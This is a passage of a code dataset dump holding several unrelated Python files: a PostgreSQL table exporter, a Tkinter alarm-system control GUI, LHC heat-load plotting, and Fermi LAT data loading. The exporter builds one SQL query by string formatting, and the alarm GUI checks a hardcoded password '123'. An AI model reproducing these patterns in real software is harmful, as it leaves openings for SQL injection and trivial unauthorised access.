'%')\n\n if not (inputData[i] in dbData):\n dbData.append(inputData[i])\n\n f = open(dbFile, 'w')\n f.write('\\n'.join(map(str, dbData)))\n f.close()\n\n print('100%')","sub_path":"src/filework.py","file_name":"filework.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"154500648","text":"from psycopg2 import sql\nimport csv\nimport os\nimport shutil\nfrom Model.QueryManager import QueryManager\n\n\nclass DatasetDownloader:\n \"\"\"Class that reads tables from a schema and puts them into a file\"\"\"\n\n def __init__(self, setid, db_connection):\n self.db_connection = db_connection\n self.cur = self.db_connection.cursor()\n self.schema = str(setid)\n self.query_man = QueryManager(self.db_connection, None)\n\n def get_csv(self, tablename, foldername, delimiter=',', quotechar='\"', null=\"NULL\", original=False):\n \"\"\"Convert a table from the dataset to a CSV file. The csv file will be stored\n in the specified folder. The filename will be the tablename followed by '.csv'.\"\"\"\n\n filename = os.path.join(foldername, tablename + \".csv\")\n\n with open(filename, 'w', encoding=\"utf-8\") as outfile:\n outcsv = csv.writer(outfile, delimiter=delimiter, quotechar=quotechar)\n\n schema = self.__get_schema(original)\n\n self.cur.execute(\n \"SELECT column_name FROM information_schema.columns WHERE table_schema = '{}' AND table_name = '{}'\".format(\n schema, tablename))\n\n # write header\n outcsv.writerow([x[0] for x in self.cur.fetchall()])\n\n self.cur.execute(\n sql.SQL(\"SELECT * FROM {}.{}\").format(sql.Identifier(schema), sql.Identifier(tablename)))\n rows = self.cur.fetchall()\n\n # replace NULL values with parameter 'null'\n for i in range(len(rows)):\n rows[i] = list(rows[i])\n for j in range(len(rows[i])):\n if rows[i][j] is None: rows[i][j] = null\n\n # write rows\n outcsv.writerows(rows)\n\n return tablename + \".csv\"\n\n def get_csv_zip(self, foldername, delimiter=',', quotechar='\"', null=\"NULL\", original=False):\n \"\"\"Converts all tables in a dataset to csv and puts them in a zip file called (setid).zip\n If original is true, the zip will contain folder 'original' and 'edited'\"\"\"\n # create temporary directory to put csv's in\n csv_temp_folder = os.path.join(foldername, \"temp\")\n os.mkdir(csv_temp_folder)\n\n if not original:\n self.__create_csvs(csv_temp_folder, delimiter, quotechar, null, original)\n else:\n # create the two subfolders\n edited_folder = os.path.join(csv_temp_folder, \"edited\")\n original_folder = os.path.join(csv_temp_folder, \"original\")\n os.mkdir(edited_folder)\n os.mkdir(original_folder)\n\n self.__create_csvs(edited_folder, delimiter, quotechar, null, False)\n self.__create_csvs(original_folder, delimiter, quotechar, null, True)\n\n # make a zip of all csv's\n shutil.make_archive(os.path.join(foldername + \"/\" + self.schema), 'zip', csv_temp_folder)\n\n shutil.rmtree(csv_temp_folder)\n return self.schema + \".zip\"\n\n def get_table_dump(self, tablename, foldername, original=False):\n \"\"\"Create a dump file with name (tablename).dump and puts it in 'foldername'\"\"\"\n\n schema = self.__get_schema(original)\n\n filename = os.path.join(foldername, tablename + \".dump\")\n with open(filename, 'w') as dumpfile:\n self.__create_table(dumpfile, schema, tablename)\n self.__insert_values(dumpfile, schema, tablename)\n\n return tablename + \".dump\"\n\n def get_dataset_dump(self, foldername, original=False):\n \"\"\"Create a dump file with name (setid).dump and puts it in 'foldername'\"\"\"\n\n # fetch all tablenames\n table_names = self.query_man.get_table_names(self.schema)\n\n dumpfolder = foldername\n # only used if original == True\n og_schema = self.__get_schema(original)\n\n if original:\n og_table_names = self.query_man.get_table_names(og_schema)\n dumpfolder = os.path.join(foldername, \"temp_folder\")\n os.mkdir(dumpfolder)\n\n with open(os.path.join(dumpfolder, self.schema + \".dump\"), 'w') as dumpfile:\n for table in table_names:\n self.__create_table(dumpfile, self.schema, table)\n\n for table in table_names:\n self.__insert_values(dumpfile, self.schema, table)\n\n if not original:\n return self.schema + \".dump\"\n else:\n with open(os.path.join(dumpfolder, og_schema + \".dump\"), 'w') as dumpfile:\n for table in og_table_names:\n self.__create_table(dumpfile, og_schema, table)\n\n for table in og_table_names:\n self.__insert_values(dumpfile, og_schema, table)\n\n # make a zip of the two dump files\n shutil.make_archive(os.path.join(foldername + \"/\" + self.schema), 'zip', dumpfolder)\n\n shutil.rmtree(dumpfolder)\n return self.schema + \".zip\"\n\n def __create_csvs(self, foldername, delimiter=',', quotechar='\"', null=\"NULL\", original=False):\n \"\"\"Converts all tables in a dataset to csv and puts them in (foldername)\"\"\"\n schema = self.__get_schema(original)\n\n # fetch all tablenames\n self.cur.execute(\"SELECT table_name FROM information_schema.tables WHERE table_schema = %s;\",\n [schema])\n result = self.cur.fetchall()\n table_names = [t[0] for t in result]\n\n # create all csv's\n for table in table_names:\n self.get_csv(table, foldername, delimiter, quotechar, null)\n\n def __create_table(self, dumpfile, schema, tablename):\n create_table_str = \"CREATE TABLE \\\"{}\\\" (\\n\".format(tablename)\n type_dict = self.query_man.get_col_types(schema, tablename)\n for col in type_dict:\n create_table_str += \"\\\"{}\\\" {},\\n\".format(col, type_dict[col])\n create_table_str = create_table_str[:-2] + \"\\n);\\n\\n\"\n dumpfile.write(create_table_str)\n\n def __insert_values(self, dumpfile, schema, tablename):\n \"\"\"write all insert statements for a table\"\"\"\n # fetch data\n self.cur.execute(sql.SQL(\"SELECT * FROM {}.{}\").format(sql.Identifier(schema), sql.Identifier(tablename)))\n # insert row statements\n dumpfile.write(\"INSERT INTO \\\"{}\\\" VALUES\\n\".format(tablename))\n rows = str()\n for row in self.cur:\n # turn every attribute into a string and escape single quotes the postgres way\n row_str = tuple([str(x).replace(\"'\", \"''\") for x in row])\n # replace double quotes to single quotes for postgres compatibility\n row_str = str(row_str).replace('\"', \"'\")\n rows += str(row_str) + \",\\n\"\n # replace last comma with a semicolon\n rows = rows[:-2] + \";\\n\"\n dumpfile.write(rows)\n\n\n def __get_schema(self, original):\n return original * \"original_\" + self.schema\n","sub_path":"client/Model/DatasetDownloader.py","file_name":"DatasetDownloader.py","file_ext":"py","file_size_in_byte":6877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"303258487","text":" \nfrom tkinter import *\nimport socket\n\nstatus = 0\ns= socket.socket()\ns.connect(( '172.20.10.2', 30303))\ns.setblocking(False)\n\n\n\ndef aktivieren():\n global status\n online_button.configure(highlightbackground=\"dark blue\")\n aktiv_label.config(text=\"Anlage im alarmfähigen Zustand\")\n aktiv_label.place (x= 215, y=130, width= 250, height= 75)\n s.send(b'1')\n\n antwort_label.place (x=0, y=0, width=0, height= 0)\n false_label.place (x= 0, y=330, width=0, height= 0)\n \n status = 1\n\n\n\n\ndef deaktivieren():\n global status\n kennwort = eingabefeld.get()\n\n if( status == 0):\n false_label.place (x= 0, y=330, width=250, height= 30)\n antwort_label.place (x= 0, y=330, width=0, height= 0)\n eingabefeld.delete(0,END)\n false_label.config(text=\"Anlage bereits deaktiv\")\n\n \n if( status == 1):\n \n if ( kennwort == \"123\"):\n antwort_label.place (x= 0, y=330, width=250, height= 30)\n false_label.place (x= 0, y=330, width=0, height= 0)\n antwort_label.config(text=\"Eingabe erfolgreich\")\n \n aktiv_label.config(text=\"Anlage ist deaktiviert\", fg= \"black\")\n online_button.configure(highlightbackground=\"light blue\")\n\n eingabefeld.delete(0,END)\n s.send(b'0')\n\n status = 0\n \n else:\n false_label.place (x= 0, y=330, width=250, height= 30)\n antwort_label.place (x= 0, y=330, width=0, height= 0)\n\n eingabefeld.delete(0,END)\n false_label.config(text=\"Falsche Eingabe!\")\n \n\n\n\nAlarmanlage= Tk()\n\nAlarmanlage.title (\"Alarmanlage-Menü\")\nAlarmanlage.geometry(\"500x550\")\n\n\nonline_button = Button(Alarmanlage, text= \"Aktivieren\", highlightbackground= \"light blue\", command= aktivieren)\noffline_button= Button(Alarmanlage, text= \"Deaktivieren\", highlightbackground= \"light blue\", command= deaktivieren)\nend_button= Button(Alarmanlage, text= \"Ausschalten\", highlightbackground=\"red\", command= Alarmanlage.destroy)\n\n\nanweisungs_label = Label(Alarmanlage, font= \"Garamond 15 bold \", fg= \"white\", bg=\"black\",\ntext=\"Folgende Funktionen stehen zur Verfügung:\\nAkivieren: Stehlt die Anlage in den alarmfähigen Zustand.\\nDeaktivieren: Die Anlage wird auf Stand-by geschaltet.\\nAusschalten: Die Anlage wird aussgeschaltet.\")\n \ninfo_label = Label(Alarmanlage, text= \"Zum deaktivieren wird\\n\\\nKennwort benötigt!\")\naktiv_label = Label(Alarmanlage, text= \"Anlage im Alarmfähigen Zustand\", fg=\"green\")\nantwort_label =Label(Alarmanlage, fg= \"green\")\nfalse_label = Label(Alarmanlage, fg= \"red\")\n\neingabefeld =Entry(Alarmanlage, bd=5, width=30)\neingabefeld.insert(10,\"*kennwort*\")\n\n\n\nanweisungs_label.place (x= 0, y=10, width =500, height=100)\nonline_button.place (x= 50, y=130, width=100, height=75)\noffline_button.place (x= 350, y=310, width=100, height= 75)\ninfo_label.place (x= 0, y=240, width=200, height= 100)\neingabefeld.place (x= 200, y=270)\nend_button.place (x= 115, y=430, width=270, height= 75)\n\n\nAlarmanlage.mainloop()\n","sub_path":"Alarmanlage-GUI.py","file_name":"Alarmanlage-GUI.py","file_ext":"py","file_size_in_byte":3155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"165156518","text":"from __future__ import division\nimport os\nimport re\nimport argparse\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport dict_utils as du\n\nfrom LHC_Heat_load_dict import main_dict\nfrom LHCMeasurementTools.mystyle import colorprog\nimport LHCMeasurementTools.mystyle as ms\nimport LHCMeasurementTools.savefig as sf\nimport LHCMeasurementTools.LHC_Heatloads as HL\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--pdsave', help='Save plots in pdijksta plot dir.', action='store_true')\nparser.add_argument('--savefig', help='Save plots with specified name.')\nparser.add_argument('--noshow', help='Do not call plt.show.', action='store_true')\nargs = parser.parse_args()\n\n\nx_label='Integrated HL [J]'\nms.mystyle(12)\nplt.rcParams['lines.markersize'] = 7\nplt.close('all')\nbbox_to_anchor=(1.4,1)\ndef legend(sp, bbox_to_anchor=(1,1), loc='upper left', **kwargs):\n sp.legend(bbox_to_anchor=bbox_to_anchor, loc=loc, **kwargs)\n\nmoment = 'stop_squeeze'\n# remove 36b fills\nmask = np.array(map(lambda s: not(s.endswith('_36')), main_dict['filling_pattern']))\nmain_dict = du.mask_dict(main_dict,mask)\n\n# remove low intensity fills\nmask = np.logical_and(main_dict[moment]['n_bunches']['b1'] > 800, main_dict[moment]['n_bunches']['b2'] > 800)\nmain_dict = du.mask_dict(main_dict,mask)\n\nheat_load_dict = main_dict[moment]['heat_load']\ntot_int = main_dict[moment]['intensity']['total']\n\nfirst_fill_2016 = 4857\nfor ctr, fill in enumerate(main_dict['filln']):\n if fill > 4857:\n index_2016 = ctr\n break\n\ntitle_list = ['Arcs', 'Q6 Quads']\nylim_list = [(0,1.5e-12), (0,3.5e-13)]\nmain_keys = ['arc_averages', 'all_cells']\ngood_keys_list = [heat_load_dict[main_keys[0]].keys(), du.q6_keys_list(main_dict)]\n\nint_dict = main_dict['hl_integrated']\nsp = None\nfigs = []\nfig = ms.figure('Integrated heat load', figs)\n#fig.subplots_adjust(left=.06, right=.84, top=.93, hspace=.38, wspace=.42)\n\nfor ctr, (good_keys,main_key, title, ylim) in enumerate(zip(good_keys_list, main_keys, title_list, ylim_list)):\n this_dict = heat_load_dict[main_key]\n\n sp = plt.subplot(2,1,ctr+1, sharex=sp)\n if title == 'Arcs':\n sp.set_ylabel('Integrated HL [J]')\n else:\n sp.set_ylabel('Norm. int. HL [J/m]')\n sp.set_title(title)\n sp.grid(True)\n\n sp2 = sp.twinx()\n sp2.set_ylabel('Normalized HL [W/p+]')\n sp2.set_ylim(*ylim)\n for key_ctr, (key, arr) in enumerate(this_dict.iteritems()):\n if key not in good_keys:\n continue\n\n item = int_dict[main_key][key]\n nan = np.isnan(item)\n item[nan] = 0\n color = colorprog(key_ctr,8)\n sp.plot(main_dict['filln'], np.cumsum(item), label=key, color=color)\n sp2.plot(main_dict['filln'], arr/main_dict[moment]['intensity']['total'], '.', color=color)\n legend(sp)\nsp.set_xlabel('Fill #')\n\nfig = ms.figure('Integrated heat load 2', figs)\n#fig.subplots_adjust(left=.06, right=.84, top=.93, hspace=.38, wspace=.42)\n\n# Arcs and Quads\nsp = None\nylim_list = [(0,None), (0, None)]\nfor ctr, (good_keys,main_key, title, ylim) in enumerate(zip(good_keys_list, main_keys, title_list, ylim_list)):\n this_dict = heat_load_dict[main_key]\n\n sp = plt.subplot(2,2,ctr+1)\n if title == 'Arcs':\n sp.set_ylabel('Normalized HL [W/p+]')\n sp.set_xlabel(x_label)\n else:\n sp.set_ylabel('Normalized HL [W/p+/m]')\n sp.set_xlabel('Norm. Int. HL [J/m]')\n sp.set_title(title)\n sp.grid(True)\n\n for key_ctr, (key, arr) in enumerate(this_dict.iteritems()):\n if key not in good_keys:\n continue\n item = int_dict[main_key][key]\n nan = np.isnan(item)\n item[nan] = 0\n\n if title == 'Arcs':\n len_ = 1.\n else:\n len_ = HL.magnet_length['Q6s_IR'+key[3]][0]\n\n\n year_change = np.sum(item[:index_2016])\n color = colorprog(key_ctr,8)\n norm_hl = this_dict[key]/main_dict[moment]['intensity']['total']\n\n if title == 'Q6 Quads':\n label = key[:4]\n else:\n label = key.replace('_',' ')\n sp.plot(np.cumsum(item)/len_, norm_hl/len_,'.', label=label, color=color)\n if key_ctr == 0:\n label = 'Begin of 2016'\n else:\n label = None\n #sp.axvline(year_change, color=color, lw=2, label=label)\n legend(sp)\n sp.set_ylim(*ylim)\n sp.set_xlim(0,None)\n\n#Bins\ncell_dict = main_dict[moment]['heat_load']['all_cells']\ncell_int_dict = main_dict['hl_integrated']['all_cells']\nn_bins = 10\n\ncell_hls = []\nfor cell, hl_arr in cell_dict.iteritems():\n cell_hls.append((cell, np.mean(hl_arr[-10:])))\n\ncell_hls = filter(lambda x: x[1] > 0, cell_hls)\ncell_hls.sort(key=lambda x: x[1])\nmin_hl, max_hl = cell_hls[0][1], cell_hls[-1][1]\ndelta_hl = (max_hl - min_hl) / (n_bins -1)\nbins = [[]]\nbin_ = bins[0]\nfor cell, hl in cell_hls:\n if hl > min_hl + delta_hl:\n min_hl += delta_hl\n bin_ = []\n bins.append(bin_)\n bin_.append(cell)\n\ndeciles = [[]]\ndecil = deciles[0]\nmax_ctr = 0 + len(cell_hls)/10.\nfor ctr, (cell, _) in enumerate(cell_hls):\n if ctr > max_ctr:\n max_ctr += len(cell_hls)/10.\n decil = []\n deciles.append(decil)\n decil.append(cell)\n\nif True:\n title = 'Deciles'\n bins = deciles\n get_label = lambda x, y: '%i0%%' % (x+1)\n legend_title = None\nelse:\n title = 'Bins'\n get_label = lambda x, y: '%i cells' % len(y)\n legend_title = 'Number of cells'\n\n\nsp = plt.subplot(2,2,3)\nsp.set_xlabel(x_label)\nsp.set_ylabel('Normalized HL [W/p+]')\nsp.set_title(title)\nsp.grid(True)\n\ntot_arr, tot_divisor = 0, 0\ntot_int_arr, tot_int_divisor = 0, 0\nfor ctr, bin_ in enumerate(bins):\n color = colorprog(ctr, bins)\n label = get_label(ctr, bin_)\n bin_arr, bin_divisor = 0, 0\n bin_int_arr, bin_int_divisor = 0, 0\n for cell in bin_:\n bin_int_arr += np.nan_to_num(cell_int_dict[cell])\n bin_int_divisor += np.isfinite(cell_int_dict[cell])\n bin_arr += np.nan_to_num(cell_dict[cell])\n bin_divisor += np.isfinite(cell_dict[cell])\n\n tot_arr += bin_arr\n tot_divisor += bin_divisor\n tot_int_arr += bin_int_arr\n tot_int_divisor += bin_int_divisor\n\n bin_hl = bin_arr/bin_divisor\n bin_int_hl = bin_int_arr / bin_int_divisor\n int_hl = np.cumsum(bin_hl)\n\n sp.plot(np.cumsum(bin_int_hl), bin_hl/tot_int, '.', color=color, label=label)\n\ntot_hl = tot_arr / tot_divisor\ntot_int_hl = tot_int_arr / tot_int_divisor\nsp.plot(np.cumsum(tot_int_hl), tot_hl/tot_int, '.', color='black', label='Average')\n\nlegend(sp, title=legend_title)\nsp.set_xlim(0,None)\n\n\n# Special cells\nsp = plt.subplot(2,2,4)\nsp.set_xlabel(x_label)\nsp.set_ylabel('Normalized HL [W/p+]')\nsp.set_title('Special cell dipoles')\nsp.grid(True)\n\nspecial_dict = main_dict[moment]['heat_load']['special_cells']\nre_special_dipole = re.compile('^.*_D[234]$')\nspecial_dip_keys = filter(re_special_dipole.match, special_dict.keys())\nfor ctr, key in enumerate(special_dip_keys):\n if key in ('33L5_D4', '33L5_D3'): continue\n\n norm_hl = special_dict[key] / tot_int\n int_hl = int_dict['special_cells'][key]\n color=ms.colorprog(ctr, special_dip_keys)\n label = key.replace('_', ' ')\n sp.plot(np.cumsum(int_hl), norm_hl, '.', label=key, color=color)\n\nsp.set_ylim(-0.1e-13,None)\nlegend(sp)\n\nfig = ms.figure('Standalone D3 in LSS 45', figs)\nsp = plt.subplot(2,2,1)\nsp.set_xlabel(x_label)\nsp.set_ylabel('Normalized HL [W/p+]')\nsp.set_title('Standalone D3 in LSS 45')\nsp.grid(True)\n\ncells_dict = main_dict[moment]['heat_load']['all_cells']\n\nctr = 0\nfor key, hl in cells_dict.iteritems():\n # Correct valve variables for standalone magnet:\n # [05L4: QRLFF_05L4_CV947.POSST (to be checked)]\n # This was wrong (13.7.17)! correct 05L4 is 'QRLEB_05L4_QBS947.POSST'\n # 05R4: QRLEB_05L4_CV947.POSST\n if (key[:4] == '05L4' and key.endswith('_2')) or (key[:4] == '05R4' and not key.endswith('_2')):\n label = key[:4]+'_standalone'\n color = ['black', 'red'][ctr]\n norm_hl = hl / tot_int\n int_hl = int_dict['all_cells'][key]\n if not np.all(np.isnan(hl)):\n sp.plot(np.cumsum(int_hl), norm_hl, '.', label=label, color=color)\n ctr += 1\n\nif args.pdsave:\n sf.pdijksta(figs)\nelif args.savefig:\n for num in plt.get_fignums():\n fig = plt.figure(num)\n plt.suptitle('')\n fig.subplots_adjust(right=0.85, wspace=0.75, hspace=.38)\n fig.savefig(os.path.expanduser(args.savefig) + '_%i.png' % num)\n\nif not args.noshow:\n plt.show()\n","sub_path":"001_integrated_hl.py","file_name":"001_integrated_hl.py","file_ext":"py","file_size_in_byte":8453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"270697431","text":"###############################################################################\n#E^2 dN/dE = (#events)*(E**2)/(exposure*pixels*(energy band width))\n#construct one value for each of the back/foreground for each version of each energy leve\n#should result in 32 values plotted on a log graph, 4 horizontal values and 8 values for each horizontal\n###############################################################################\nfrom __future__ import division\nimport numpy\nimport scipy\nimport pylab as plt\n###############################################################################\n#importing data\n###############################################################################\nlowR1V1 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_1467MeV_R1_version1.txt\")\nlowR1V1 = numpy.asmatrix(lowR1V1)\nlowR1V2 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_1467MeV_R1_version2.txt\")\nlowR1V2 = numpy.asmatrix(lowR1V2)\nlowR1V3 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_1467MeV_R1_version3.txt\")\nlowR1V3 = numpy.asmatrix(lowR1V3)\nlowR1V4 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_1467MeV_R1_version4.txt\")\nlowR1V4 = numpy.asmatrix(lowR1V4)\nlowR2V1 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_1467MeV_R2_version1.txt\")\nlowR2V1 = numpy.asmatrix(lowR2V1)\nlowR2V2 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_1467MeV_R2_version2.txt\")\nlowR2V2 = numpy.asmatrix(lowR2V2)\nlowR2V3 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_1467MeV_R2_version3.txt\")\nlowR2V3 = numpy.asmatrix(lowR2V3)\nlowR2V4 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_1467MeV_R2_version4.txt\")\nlowR2V4 = numpy.asmatrix(lowR2V4)\nlowR3V1 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_1467MeV_R3_version1.txt\")\nlowR3V1 = numpy.asmatrix(lowR3V1)\nlowR3V2 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_1467MeV_R3_version2.txt\")\nlowR3V2 = numpy.asmatrix(lowR3V2)\nlowR3V3 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_1467MeV_R3_version3.txt\")\nlowR3V3 = numpy.asmatrix(lowR3V3)\nlowR3V4 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_1467MeV_R3_version4.txt\")\nlowR3V4 = numpy.asmatrix(lowR3V4)\nmidR1V1 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_3161MeV_R1_version1.txt\")\nmidR1V1 = numpy.asmatrix(midR1V1)\nmidR1V2 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_3161MeV_R1_version2.txt\")\nmidR1V2 = numpy.asmatrix(midR1V2)\nmidR1V3 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_3161MeV_R1_version3.txt\")\nmidR1V3 = numpy.asmatrix(midR1V3)\nmidR1V4 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_3161MeV_R1_version4.txt\")\nmidR1V4 = numpy.asmatrix(midR1V4)\nmidR2V1 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_3161MeV_R2_version1.txt\")\nmidR2V1 = numpy.asmatrix(midR2V1)\nmidR2V2 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_3161MeV_R2_version2.txt\")\nmidR2V2 = numpy.asmatrix(midR2V2)\nmidR2V3 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_3161MeV_R2_version3.txt\")\nmidR2V3 = numpy.asmatrix(midR2V3)\nmidR2V4 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_3161MeV_R2_version4.txt\")\nmidR2V4 = numpy.asmatrix(midR2V4)\nmidR3V1 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_3161MeV_R3_version1.txt\")\nmidR3V1 = numpy.asmatrix(midR3V1)\nmidR3V2 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_3161MeV_R3_version2.txt\")\nmidR3V2 = numpy.asmatrix(midR3V2)\nmidR3V3 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_3161MeV_R3_version3.txt\")\nmidR3V3 = numpy.asmatrix(midR3V3)\nmidR3V4 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_3161MeV_R3_version4.txt\")\nmidR3V4 = numpy.asmatrix(midR3V4)\nhieR1V1 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_6809MeV_R1_version1.txt\")\nhieR1V1 = numpy.asmatrix(hieR1V1)\nhieR1V2 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_6809MeV_R1_version2.txt\")\nhieR1V2 = numpy.asmatrix(hieR1V2)\nhieR1V3 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_6809MeV_R1_version3.txt\")\nhieR1V3 = numpy.asmatrix(hieR1V3)\nhieR1V4 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_6809MeV_R1_version4.txt\")\nhieR1V4 = numpy.asmatrix(hieR1V4)\nhieR2V1 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_6809MeV_R2_version1.txt\")\nhieR2V1 = numpy.asmatrix(hieR2V1)\nhieR2V2 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_6809MeV_R2_version2.txt\")\nhieR2V2 = numpy.asmatrix(hieR2V2)\nhieR2V3 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_6809MeV_R2_version3.txt\")\nhieR2V3 = numpy.asmatrix(hieR2V3)\nhieR2V4 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_6809MeV_R2_version4.txt\")\nhieR2V4 = numpy.asmatrix(hieR2V4)\nhieR3V1 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_6809MeV_R3_version1.txt\")\nhieR3V1 = numpy.asmatrix(hieR3V1)\nhieR3V2 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_6809MeV_R3_version2.txt\")\nhieR3V2 = numpy.asmatrix(hieR3V2)\nhieR3V3 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_6809MeV_R3_version3.txt\")\nhieR3V3 = numpy.asmatrix(hieR3V3)\nhieR3V4 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_6809MeV_R3_version4.txt\")\nhieR3V4 = numpy.asmatrix(hieR3V4)\nmaxR1V1 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_14676MeV_R1_version1.txt\")\nmaxR1V1 = numpy.asmatrix(maxR1V1)\nmaxR1V2 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_14676MeV_R1_version2.txt\")\nmaxR1V2 = numpy.asmatrix(maxR1V2)\nmaxR1V3 = numpy.loadtxt(\"C:/Users/Richard 